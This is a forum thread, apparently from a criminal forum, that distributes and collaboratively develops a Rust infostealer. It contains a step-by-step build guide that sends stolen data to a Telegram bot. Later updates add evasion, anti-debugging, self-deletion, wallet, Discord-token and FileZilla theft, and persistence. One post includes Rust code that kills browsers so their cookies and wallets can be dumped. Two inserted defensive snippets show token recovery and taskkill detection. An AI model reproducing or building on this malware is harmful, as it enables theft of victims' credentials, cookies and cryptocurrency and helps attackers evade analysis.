
FREE & opensrc Rust Stealer

It's fine.
Everyone is here to learn.
I will make a short tutorial on Friday (I'm NOT home so I can only support via phone)
Already in it.
Hi bro, the GitHub link was disabled... do you know it? I tried to open it, it was disabled already.
 
Please note that this user is banned
Any idea how to fix this?
 

Attachments

  • photo_2023-07-18_14-05-46.jpg
    76.6 KB · Views: 187
As promised, here is a tutorial for everyone (with screens)
1. Download the src and unzip it.

2. Install Rustup from here. https://win.rustup.rs/x86_64
2.1 Install VS Studio and select the Desktop Development with C++ (needed for linking)
View attachment 39076


After you have installed it all, you can finally go to tg and create a bot.
3. You can open main.rs with any editor.
Now copy the bot token into View attachment 39077

Between the " ";
It will look like this.
View attachment 39078
Now create a Group and add your created bot.
After that get the Channel ID via https://web.telegram.org/z/
Select the group and you will see the id in the url: Example
View attachment 39079
Now copy the whole part after the # into the CHANNEL_ID field.
It will look something like this:

View attachment 39080


Now you can type in a cmd or in your IDE

Code:
cargo build --release
Now you will find your ready stealer in target\release\

Have fun & if you need help, don't be shy to contact me
For more information about this error, try `rustc --explain E0793`.
error: could not compile `ntapi` (lib) due to 2 previous errors
warning: build failed, waiting for other jobs to finish...

I have a problem like this, how can I solve it?
 
Hello,
I have updated this cool application cuz I started to learn rust!

Here is what I have changed, my main goal was to make it safer for user, and more undetected for victim.
- Fixed compilation error.
- Generated files will automatically be deleted from temp folder (out.zip, sensfiles.zip).
- Now API, and CHANNEL ID are encrypted in XOR, just run Python script that will encrypt API, and CHANNEL ID, put encrypted strings in main.rs, and everything will be working. In this way, during static analysis, you can't find normal API, and CHANNEL ID, you can only find encrypted API, and CHANNEL ID. Ofc you can still get these strings during debugging, but in next update, I'll add detection for tools that are being used to analyze file activity including network activity, so your API, and CHANNEL ID will be even safer!

If you need any help, write below :)
Hope u will like it DoKitO
 

Attachments

  • rust-stealer-xss-master-updated.zip
    30.7 KB · Views: 71
Another update from Tomek! Cuz I started to learn rust!

In previous update:
Here is what I have changed, my main goal was to make it safer for user, and more undetected for victim.
- Fixed compilation error.
- Generated files will automatically be deleted from temp folder (out.zip, sensfiles.zip).
- Now API, and CHANNEL ID are encrypted in XOR, just run Python script that will encrypt API, and CHANNEL ID, put encrypted strings in main.rs, and everything will be working. In this way, during static analysis, you can't find normal API, and CHANNEL ID, you can only find encrypted API, and CHANNEL ID. Ofc you can still get these strings during debugging, but in next update, I'll add detection for tools that are being used to analyze file activity, including network activity, so your API, and CHANNEL ID will be even safer!

New update:
- Added detection for running well known tools eg fiddler, dbg, etc...
- Added detection for debugging, very simple I'll add more flags later
- Changed handling of errors, if there is any error, instead just closing program, it will delete itself to remove all traces (I assume this application is not executed by victim, but by another software for payloads)

Ty coree and DrClinker for providing the resource in this thread:
https://xss.pro/threads/94178/

If you need any help, write below. I'm happy to help :)
 

Attachments

  • Updated 1.1.zip
    30.5 KB · Views: 57
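For analysts triaging a sample like the one described in the two posts above: XOR-encoding the bot token and channel ID does not survive a key sweep, because a Telegram bot token has a recognisable shape. This is an added example, not code from the thread or its attachments; it assumes a single-byte key and that the channel ID uses the same key (the posts do not specify the scheme), and all sample values are constructed.

```python
import re

# Telegram bot tokens look like "<numeric bot id>:<35 URL-safe characters>".
TOKEN_RE = re.compile(rb"\d{8,10}:[A-Za-z0-9_-]{35}")
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{6,}")


def xor1(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (assumed scheme, see lead-in)."""
    return data.translate(bytes(i ^ key for i in range(256)))


def find_xored_tokens(blob: bytes) -> list[tuple[int, int, str]]:
    """Try all 256 keys; return (key, offset, token) for every decoded
    region shaped like a bot token. Key 0 covers tokens left in plaintext."""
    hits = []
    for key in range(256):
        for m in TOKEN_RE.finditer(xor1(blob, key)):
            hits.append((key, m.start(), m.group().decode("ascii")))
    return hits


def strings_with_key(blob: bytes, key: int) -> list[str]:
    """Printable runs after decoding with a recovered key, to surface
    neighbouring values (such as the channel ID) stored the same way."""
    return [m.group().decode("ascii")
            for m in PRINTABLE_RE.finditer(xor1(blob, key))]


# Constructed sample, not taken from any real binary.
SAMPLE_TOKEN = "123456789:" + "AbCdE" * 7
SAMPLE_CHANNEL = "-1001234567890"
SAMPLE_BLOB = (b"\xff\xfe\xfd\xfc" + xor1(SAMPLE_TOKEN.encode(), 0x5A)
               + b"\x80\x81" + xor1(SAMPLE_CHANNEL.encode(), 0x5A) + b"\xff")

if __name__ == "__main__":
    for key, offset, token in find_xored_tokens(SAMPLE_BLOB):
        print(f"key=0x{key:02x} offset={offset} token={token}")
        print("other strings:", strings_with_key(SAMPLE_BLOB, key))
```

A recovered token and channel ID are indicators that can be reported to the platform and searched for in proxy or DNS logs alongside api.telegram.org traffic.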
[Update log]
Sorry guys I must admit i was lazy & also busy

Here is a new update

Some stuff that changed
- Fixed Chrome stuff(opera and all other shit)
- Added metamask address grabber(rushed)
- Full redline format
- Improved Clipper & Added Critical Process
- Fixed Persistence
- Some other shit
- VPN & Filezilla

might release telegram gate later
 

Attachments

  • rust-stealer-xss.zip
    32.4 KB · Views: 167
I found a little mistake. It doesn't pick up cookies and wallets when the browser is running. You need to stop the browser before taking data from it.
Code:
use std::process::Command;
use std::os::windows::process::CommandExt;
use winapi::um::winbase::CREATE_NO_WINDOW;
/* ... */
fn kill_browsers() -> Vec<String> {
    let browsers = vec!["chrome.exe", "brave.exe", "edge.exe"];
    let mut killed = Vec::new();
    for browser in browsers {
        let output = Command::new("taskkill")
            .arg("/F")
            .arg("/IM")
            .arg(browser)
            .arg("/T")
            .creation_flags(CREATE_NO_WINDOW)
            .output()
            .expect("");
        if output.status.success() {
            killed.push(browser.to_string());
        }
    }
    killed
}
/* ... */

let reborn_browsers_vec = kill_browsers();
    unsafe {
        let _ = opt_browsers
        .into_iter()
        .filter_map(|v| browsers.get(v.as_str()).cloned())
        .map(|mut v| v.dump(path.clone()).map(|_| v))
        .filter_map(|v| v.ok())
        .collect::<Vec<_>>();
    }
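On the detection side, the behaviour in the snippet above (one process force-killing several browsers in quick succession) stands out in process-creation telemetry. The following is an added example, not part of the original post: the event field names, the thresholds and the sample events are constructed, and msedge.exe is added to the three image names the snippet lists.

```python
import json
from collections import defaultdict

# The three image names from the snippet above, plus msedge.exe (added here).
BROWSERS = {"chrome.exe", "brave.exe", "edge.exe", "msedge.exe"}
WINDOW_SECONDS = 10   # assumed threshold
MIN_DISTINCT = 2      # assumed threshold


def forced_kill_target(cmdline: str):
    """Return the browser image named by `taskkill /F /IM <image>`, else None."""
    args = [a.strip('"') for a in cmdline.lower().split()]
    if not args or not args[0].endswith(("taskkill", "taskkill.exe")):
        return None
    if "/f" not in args or "/im" not in args[:-1]:
        return None
    target = args[args.index("/im") + 1]
    return target if target in BROWSERS else None


def detect(events):
    """Alert when one parent force-kills several different browsers in a burst."""
    kills = defaultdict(list)
    for ev in events:
        target = forced_kill_target(ev["cmdline"])
        if target:
            kills[(ev["host"], ev["parent_pid"], ev["parent"])].append((ev["ts"], target))
    alerts = []
    for (host, _pid, parent), seen in kills.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            burst = {t for ts, t in seen[i:] if ts - start <= WINDOW_SECONDS}
            if len(burst) >= MIN_DISTINCT:
                alerts.append({"host": host, "parent": parent, "targets": sorted(burst)})
                break
    return alerts


# Constructed process-creation events (field names are hypothetical).
SAMPLE_LOG = r"""
{"ts": 100, "host": "ws1", "parent_pid": 4242, "parent": "C:\\Users\\a\\AppData\\Local\\Temp\\setup.exe", "cmdline": "taskkill /F /IM chrome.exe /T"}
{"ts": 100, "host": "ws1", "parent_pid": 4242, "parent": "C:\\Users\\a\\AppData\\Local\\Temp\\setup.exe", "cmdline": "taskkill /F /IM brave.exe /T"}
{"ts": 101, "host": "ws1", "parent_pid": 4242, "parent": "C:\\Users\\a\\AppData\\Local\\Temp\\setup.exe", "cmdline": "taskkill /F /IM edge.exe /T"}
{"ts": 300, "host": "ws2", "parent_pid": 900, "parent": "C:\\Windows\\System32\\cmd.exe", "cmdline": "taskkill /IM chrome.exe"}
{"ts": 400, "host": "ws2", "parent_pid": 900, "parent": "C:\\Windows\\System32\\cmd.exe", "cmdline": "C:\\Windows\\System32\\taskkill.exe /F /IM notepad.exe"}
"""
EVENTS = [json.loads(line) for line in SAMPLE_LOG.strip().splitlines()]
```

Calling `detect(EVENTS)` flags only the ws1 parent; the single unforced kill and the non-browser kill on ws2 stay below the threshold.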
 
SysToolsLib/PowerShell/ShadowCopy.ps1 at master · JFLarvoire/SysToolsLib (github.com)

Method for copying the cookies.db file without killing the browser.

I'm not a Rust pro :D Can anyone handle this for Rust?
 
This is not a good idea, I had a similar idea but it wasn't working all the time. Btw there will be a new update with a lot of features! DoKitO told me he will check this bug :) This cookies stealer is probably the most important part of this stealer imo.
The finest new stuff from this list is the filezilla stealer + discord token stealer
raw (2).png
 
New UPDATE:
So far, the following tasks have been completed:
  • Removing out.zip and sensfiles.zip from the temp directory
  • Obfuscated everything in Chromium folder
  • Fixed FileZilla
  • Fixed Uplay
  • Removed Steam
  • Added Discord Token Grabber
  • Added full Obfuscation for Telegram Strings (Without any python encryption etc...)
  • Added Anti-Analysis function
Known issues:
  • Cookie dumper for chromium is not working always :(
  • Missing obfuscation in strings
From now @DoKit0 will also add new things to this version so there will be always one version of the best rust stealer!
 

Attachments

  • rust-stealer-public-main.zip
    37 KB · Views: 77
Small update!
- More info about stolen things e.g. Discord Tokens, Servers FTP/SSH, Others
- More flags for detecting debugging
- Other simple changes

Preview:
imageee.png


Known issues:
- Cookie dumper for chromium is not working always
- Missing obfuscation in strings
 

Attachments

  • rust-stealer-public.zip
    37.9 KB · Views: 106